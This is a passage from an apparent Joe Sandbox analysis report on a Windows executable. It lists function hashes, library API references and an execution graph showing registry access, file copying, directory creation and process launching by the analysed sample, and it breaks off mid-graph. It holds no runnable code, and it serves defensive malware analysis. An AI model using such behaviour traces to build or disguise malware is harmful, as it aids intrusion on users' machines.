                                                                                                                                                                                                                                        • Instruction ID: f3687dc0d93d2bc51afd8cabf3763ae673702e15127c302aa4dd6949bf82d100
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7131FC7E9002156FDF237B6C9C007DE37959F05B28F144419ED18EB388DB749542CBA2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 029366D9 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __getptd_noexit.LIBCMT ref: 029366DD
                                                                                                                                                                                                                                          • Part of subcall function 028959BF: __calloc_crt.LIBCMT ref: 028959E2
                                                                                                                                                                                                                                          • Part of subcall function 028959BF: __initptd.LIBCMT ref: 02895A04
                                                                                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 02936700
                                                                                                                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 0293671E
                                                                                                                                                                                                                                        • __invoke_watson.LIBCMT ref: 0293673B
                                                                                                                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 0293676D
                                                                                                                                                                                                                                        • __invoke_watson.LIBCMT ref: 0293678B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4066021419-0
                                                                                                                                                                                                                                        • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                                                                                                                        • Instruction ID: 15ec4ce903b5d17d7f53f75221e4cb27ef73c0b93c205f9425773ca926a11178
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF11C17A6017147BEB236B299C00BAB73DDDF407A5F840426FE09E6240E735D9018AEA
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02882670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                                                                                        • String ID: D
                                                                                                                                                                                                                                        • API String ID: 2102423945-2746444292
                                                                                                                                                                                                                                        • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                                                                                                                        • Instruction ID: 86e8b9bc8f92fce00e2fd2d2a13ad0e32fb16e0a016e7d8e631588ce961b62f2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75E17C79D00259EBCF24EBA4CD49FEEB7B8BF04304F0440A9E909E6194EB746A45CF54
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0287D8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                                                                                        • String ID: $$$(
                                                                                                                                                                                                                                        • API String ID: 2102423945-3551151888
                                                                                                                                                                                                                                        • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                                                                                                                        • Instruction ID: 70157bff53ef46036713fab82ad3f71f98238707a69720989fa2f2bd5ed0c639
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD91C179D00218ABEF20DFA4CC45BEDBBB5AF05308F144069D409B72C1DBB65A48CF65
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02895CE1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _wcsnlen
                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                        • API String ID: 3628947076-3372436214
                                                                                                                                                                                                                                        • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                                                                                                                                                        • Instruction ID: bdf8275e58cbd6283415d46f6afd0452f4d7c6253c8ba69769a8cc4cbea47f49
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3321083E20420CAEEF019AA8EC45BBE739DDB45664F984175E908C6590FB74EA408AA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0288A810 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                                                                                        • String ID: p2Q
                                                                                                                                                                                                                                        • API String ID: 2102423945-1521255505
                                                                                                                                                                                                                                        • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                                                                                                                        • Instruction ID: 2a22ea83dc14412602307bfd0c0f923a60ad3e0f0e0f7e794d4251d9a80731d0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7F0C97C698750A5FB21B758BC26B857E916B31F48F144088E1182A2E1D2F9378CA7DA
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 028BFBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 028BFBF1
                                                                                                                                                                                                                                          • Part of subcall function 028A169C: std::exception::_Copy_str.LIBCMT ref: 028A16B5
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 028BFC06
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                                                                                                                                                                                                                                        • String ID: TeM$TeM
                                                                                                                                                                                                                                        • API String ID: 3662862379-3870166017
                                                                                                                                                                                                                                        • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                                                                                                                        • Instruction ID: 610ecf187f0c9bfa140db7bb4933352d8dd48e7e55823a416d9897dae04c8622
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91D06779C0020CBBDB00EFA9D459CDDBBB9AA04344F008466A92897241EB74A3498F95
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0287D0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0289197D: __wfsopen.LIBCMT ref: 02891988
                                                                                                                                                                                                                                        • _fgetws.LIBCMT ref: 0287D15C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __wfsopen_fgetws
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 853134316-0
                                                                                                                                                                                                                                        • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                                                                                                                        • Instruction ID: 0387e5a43fda64dec3a14e3ce145250e75bcadc6f0325eee233d18730550d5bb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2191A37DD003199BCF20DFA8CD44BAEB7B5AF14314F180529E819E7240E775EA05CBA6
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0287D540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _malloc$__except_handler4_fprintf
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1783060780-0
                                                                                                                                                                                                                                        • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                                                                                                                                                        • Instruction ID: 396aae10abe3060a5d3a7dd5f5d6359843145221771857d131d00f844ef2903e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AA152B9C00249EBEF11EFE8DC45BDEBB76AF14314F180028D505B6291D7769648CBA7
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02892AD0 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2974526305-0
                                                                                                                                                                                                                                        • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                                                                                                                                                        • Instruction ID: df3c0bec8467698afd4421e4d778388a44808ba0e0eba89b50d448fc59c7eafd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB51A27CA00209EBDF298F79888066E77E6AF40328F1C8729EC39D62D8D7749950CB41
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 028B1359 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                                                                                                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                                                                                                        • Instruction ID: 13b6d0e980badf75026a1476049bce1a7f7fe44963f62b48bbd2f49c1fa20e95
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5501303A40014EBBCF135E88DC198EE3F62BF1D354B488419FA5D98630E736C5B1AB81
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02937A34 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___BuildCatchObject.LIBCMT ref: 02937A4B
                                                                                                                                                                                                                                          • Part of subcall function 02938140: ___BuildCatchObjectHelper.LIBCMT ref: 02938172
                                                                                                                                                                                                                                          • Part of subcall function 02938140: ___AdjustPointer.LIBCMT ref: 02938189
                                                                                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 02937A62
                                                                                                                                                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 02937A74
                                                                                                                                                                                                                                        • CallCatchBlock.LIBCMT ref: 02937A98
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2901542994-0
                                                                                                                                                                                                                                        • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                                                                                                        • Instruction ID: ebe74f11fbbe5d8e24394de95431f9da71c6ec60b08fa55f43898c5b48f9ff1e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA01D772400109BBCF13AF95CC04EEA7BBAFF89754F158014F95866120D776E961DFA4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:5.3%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                        Signature Coverage:4%
                                                                                                                                                                                                                                        Total number of Nodes:1957
                                                                                                                                                                                                                                        Total number of Limit Nodes:176
                                                                                                                                                                                                                                        execution_graph 41606 41bae0 41607 41bba0 41606->41607 41608 41bb13 41606->41608 41609 41bf3d 41607->41609 41610 41bbad 41607->41610 41611 41bb15 41608->41611 41612 41bb54 41608->41612 41618 41bf65 IsWindow 41609->41618 41619 41bf9a DefWindowProcW 41609->41619 41614 41bbb0 DefWindowProcW 41610->41614 41615 41bbd7 41610->41615 41616 41bb47 PostQuitMessage 41611->41616 41617 41bb1c 41611->41617 41613 41bb70 41612->41613 41620 41bb75 DefWindowProcW 41612->41620 41682 420c62 41615->41682 41616->41613 41617->41613 41617->41614 41624 41bb2e 41617->41624 41618->41613 41622 41bf73 DestroyWindow 41618->41622 41622->41613 41624->41613 41645 411cd0 41624->41645 41626 41bc26 41706 41ce80 59 API calls _memmove 41626->41706 41628 41bb3f 41628->41618 41631 41bc3a 41707 420bed 58 API calls 2 library calls 41631->41707 41632 41befb IsWindow 41633 41bf11 41632->41633 41634 41bf28 41632->41634 41633->41634 41635 41bf1a DestroyWindow 41633->41635 41634->41613 41635->41634 41636 41bef7 41636->41632 41636->41634 41637 414690 59 API calls 41642 41bcdc 41637->41642 41642->41632 41642->41636 41642->41637 41644 41be8f CreateThread 41642->41644 41708 40eff0 65 API calls 41642->41708 41709 41c330 41642->41709 41715 41c240 41642->41715 41721 41b8b0 41642->41721 41743 41ce80 59 API calls _memmove 41642->41743 41644->41642 41744 42f7c0 41645->41744 41648 411d20 _memset 41650 411d40 RegQueryValueExW RegCloseKey 41648->41650 41649 411e6a 41649->41628 41651 411d8f 41650->41651 41746 415c10 41651->41746 41653 411dbf 41654 411dd1 lstrlenA 41653->41654 41655 411e7c 41653->41655 41759 413520 41654->41759 41657 411e94 6 API calls 41655->41657 41658 411e89 41655->41658 41659 411ef5 UuidCreate UuidToStringW 41657->41659 41658->41657 41662 411f36 41659->41662 41660 411e3c PathFileExistsW 41660->41655 41663 411e52 41660->41663 41661 411df1 41661->41660 41662->41662 41664 415c10 59 API calls 41662->41664 41663->41649 41762 414690 41663->41762 41665 411f59 RpcStringFreeW PathAppendW CreateDirectoryW 41664->41665 41668 411fce 41665->41668 41670 411f98 41665->41670 41667 415c10 59 API calls 41667->41668 41669 415c10 59 API calls 41668->41669 41671 41201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 41669->41671 41670->41667 41672 4121d1 41671->41672 41673 41207c _memset 41671->41673 41672->41649 41674 412095 6 API calls 41673->41674 41675 412115 _memset 41674->41675 41676 412109 41674->41676 41678 412125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 41675->41678 41785 413260 41676->41785 41679 4121b2 41678->41679 41680 4121aa GetLastError 41678->41680 41681 4121c0 WaitForSingleObject 41679->41681 41680->41672 41681->41672 41681->41681 41683 420cdd 41682->41683 41696 420c6e 41682->41696 41827 42793d DecodePointer 41683->41827 41685 420ce3 41687 425208 _vscan_fn 57 API calls 41685->41687 41698 41bbe9 GetComputerNameW 41687->41698 41688 420ca1 RtlAllocateHeap 41688->41696 41688->41698 41690 420cc9 41824 425208 41690->41824 41694 420cc7 41697 425208 _vscan_fn 57 API calls 41694->41697 41695 420c79 41695->41696 41820 427f51 58 API calls __NMSG_WRITE 41695->41820 41821 427fae 58 API calls 7 library calls 41695->41821 41822 427b0b GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 41695->41822 41696->41688 41696->41690 41696->41694 41696->41695 41823 42793d DecodePointer 41696->41823 41697->41698 41699 413100 41698->41699 41700 413121 41699->41700 41701 413133 41699->41701 41702 415c10 59 API calls 41700->41702 41704 415c10 59 API calls 41701->41704 41703 41312c 41702->41703 41703->41626 41705 413159 41704->41705 41705->41626 41706->41631 41707->41642 41708->41642 41864 41d3c0 41709->41864 41712 41c35b 41712->41642 41875 41d340 41715->41875 41718 41c26b 41718->41642 41722 41b8d6 41721->41722 41725 41b8e0 41721->41725 41723 414690 59 API calls 41722->41723 41723->41725 41724 41b916 41727 41b930 41724->41727 41728 414690 59 API calls 41724->41728 41725->41724 41726 414690 59 API calls 41725->41726 41726->41724 41729 41b94a 41727->41729 41730 414690 59 API calls 41727->41730 41728->41727 41731 41b964 41729->41731 41732 414690 59 API calls 41729->41732 41730->41729 41889 41bfd0 41731->41889 41732->41731 41734 41b976 41735 41bfd0 59 API calls 41734->41735 41736 41b988 41735->41736 41737 41bfd0 59 API calls 41736->41737 41738 41b99a 41737->41738 41739 414690 59 API calls 41738->41739 41741 41b9b4 41738->41741 41739->41741 41740 41b9f2 41740->41642 41741->41740 41901 413ff0 41741->41901 41743->41642 41745 411cf2 RegOpenKeyExW 41744->41745 41745->41648 41745->41649 41747 415c66 41746->41747 41752 415c1e 41746->41752 41748 415c76 41747->41748 41749 415cff 41747->41749 41757 415c88 _signal 41748->41757 41792 416950 41748->41792 41801 44f23e 59 API calls 2 library calls 41749->41801 41752->41747 41758 414690 59 API calls 41752->41758 41757->41653 41758->41747 41760 414690 59 API calls 41759->41760 41761 413550 41760->41761 41761->41661 41763 4146a9 41762->41763 41764 41478c 41762->41764 41766 4146b6 41763->41766 41767 4146e9 41763->41767 41817 44f26c 59 API calls 3 library calls 41764->41817 41768 414796 41766->41768 41769 4146c2 41766->41769 41770 4147a0 41767->41770 41771 4146f5 41767->41771 41818 44f26c 59 API calls 3 library calls 41768->41818 41816 413340 59 API calls _memmove 41769->41816 41819 44f23e 59 API calls 2 library calls 41770->41819 41774 414707 _signal 41771->41774 41776 416950 59 API calls 41771->41776 41774->41649 41776->41774 41781 4146e0 41781->41649 41786 41326f 41785->41786 41788 41327d 41785->41788 41787 415c10 59 API calls 41786->41787 41789 413278 41787->41789 41788->41788 41790 415c10 59 API calls 41788->41790 41789->41675 41791 41329c 41790->41791 41791->41675 41793 416986 41792->41793 41794 4169d3 41793->41794 41797 416a0d _signal 41793->41797 41802 423b4c 41793->41802 41794->41797 41812 44f1bb 59 API calls 3 library calls 41794->41812 41797->41757 41804 423b54 41802->41804 41803 420c62 _malloc 58 API calls 41803->41804 41804->41803 41805 423b6e 41804->41805 41807 423b72 std::exception::exception 41804->41807 41813 42793d DecodePointer 41804->41813 41805->41794 41814 430eca RaiseException 41807->41814 41809 423b9c 41815 430d91 58 API calls _free 41809->41815 41811 423bae 41811->41794 41813->41804 41814->41809 41815->41811 41816->41781 41817->41768 41818->41770 41820->41695 41821->41695 41823->41696 41828 42501f GetLastError 41824->41828 41826 42520d 41826->41694 41827->41685 41842 432534 41828->41842 41830 425034 41831 425082 SetLastError 41830->41831 41845 428c96 41830->41845 41831->41826 41835 42505b 41836 425061 41835->41836 41837 425079 41835->41837 41852 42508e 58 API calls 4 library calls 41836->41852 41853 420bed 58 API calls 2 library calls 41837->41853 41840 42507f 41840->41831 41841 425069 GetCurrentThreadId 41841->41831 41843 432547 41842->41843 41844 43254b TlsGetValue 41842->41844 41843->41830 41844->41830 41846 428c9d 41845->41846 41848 425047 41846->41848 41850 428cbb 41846->41850 41854 43b813 41846->41854 41848->41831 41851 432553 TlsSetValue 41848->41851 41850->41846 41850->41848 41862 4329c9 Sleep 41850->41862 41851->41835 41852->41841 41853->41840 41855 43b81e 41854->41855 41857 43b839 41854->41857 41856 43b82a 41855->41856 41855->41857 41858 425208 _vscan_fn 57 API calls 41856->41858 41859 43b849 HeapAlloc 41857->41859 41860 43b82f 41857->41860 41863 42793d DecodePointer 41857->41863 41858->41860 41859->41857 41859->41860 41860->41846 41862->41850 41863->41857 41868 41ccc0 41864->41868 41867 44f23e 59 API calls 2 library calls 41869 423b4c 59 API calls 41868->41869 41870 41ccca 41869->41870 41873 41c347 41870->41873 41874 44f1bb 59 API calls 3 library calls 41870->41874 41873->41712 41873->41867 41881 41cc50 41875->41881 41878 41c257 41878->41718 41880 44f23e 59 API calls 2 library calls 41878->41880 41882 423b4c 59 API calls 41881->41882 41883 41cc5d 41882->41883 41886 41cc64 41883->41886 41888 44f1bb 59 API calls 3 library calls 41883->41888 41886->41878 41887 41d740 59 API calls 41886->41887 41887->41878 41890 41c001 41889->41890 41896 41c00a 41889->41896 41891 41c083 41890->41891 41892 41c04c 41890->41892 41890->41896 41893 41c09e 41891->41893 41899 41c0e1 41891->41899 41928 41cf30 41892->41928 41895 41cf30 59 API calls 41893->41895 41898 41c0b2 41895->41898 41896->41734 41898->41896 41932 41d5b0 41898->41932 41936 41c540 59 API calls Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception 41899->41936 41902 4140f2 41901->41902 41903 414009 41901->41903 41940 44f26c 59 API calls 3 library calls 41902->41940 41905 414016 41903->41905 41906 41405d 41903->41906 41909 4140fc 41905->41909 41910 414022 41905->41910 41907 414106 41906->41907 41908 414066 41906->41908 41942 44f23e 59 API calls 2 library calls 41907->41942 41924 414078 _signal 41908->41924 41939 416760 59 API calls 2 library calls 41908->41939 41941 44f26c 59 API calls 3 library calls 41909->41941 41912 414044 41910->41912 41913 41402b 41910->41913 41938 412e80 59 API calls _memmove 41912->41938 41937 412e80 59 API calls _memmove 41913->41937 41919 414054 41919->41740 41920 41403b 41920->41740 41924->41740 41929 41cf41 41928->41929 41930 41cf5b 41928->41930 41929->41930 41931 414690 59 API calls 41929->41931 41930->41896 41931->41929 41934 41d5e2 41932->41934 41933 41d63e 41933->41896 41934->41933 41935 414690 59 API calls 41934->41935 41935->41934 41936->41898 41937->41920 41938->41919 41939->41924 41940->41909 41941->41907 41943 423f84 41944 423f90 __ioinit 41943->41944 41980 432603 GetStartupInfoW 41944->41980 41947 423f95 41982 4278d5 GetProcessHeap 41947->41982 41948 423fed 41949 423ff8 41948->41949 42311 42411a 58 API calls 3 library calls 41948->42311 41983 425141 41949->41983 41952 423ffe 41953 424009 __RTC_Initialize 41952->41953 42312 42411a 58 API calls 3 library calls 41952->42312 42004 428754 41953->42004 41956 424018 41957 424024 GetCommandLineW 41956->41957 42313 42411a 58 API calls 3 library calls 41956->42313 42023 43235f GetEnvironmentStringsW 41957->42023 41960 424023 41960->41957 41963 42403e 41964 424049 41963->41964 42314 427c2e 58 API calls 3 library calls 41963->42314 42033 4321a1 41964->42033 41968 42405a 42047 427c68 41968->42047 41971 424062 41972 42406d __wwincmdln 41971->41972 42316 427c2e 58 API calls 3 library calls 41971->42316 42053 419f90 41972->42053 41975 424081 41976 424090 41975->41976 42317 427f3d 58 API calls _doexit 41975->42317 42318 427c59 58 API calls _doexit 41976->42318 41979 424095 __ioinit 41981 432619 41980->41981 41981->41947 41982->41948 42319 427d6c 36 API calls 2 library calls 41983->42319 41985 425146 42320 428c48 InitializeCriticalSectionAndSpinCount __ioinit 41985->42320 41987 42514b 41988 42514f 41987->41988 42322 4324f7 TlsAlloc 41987->42322 42321 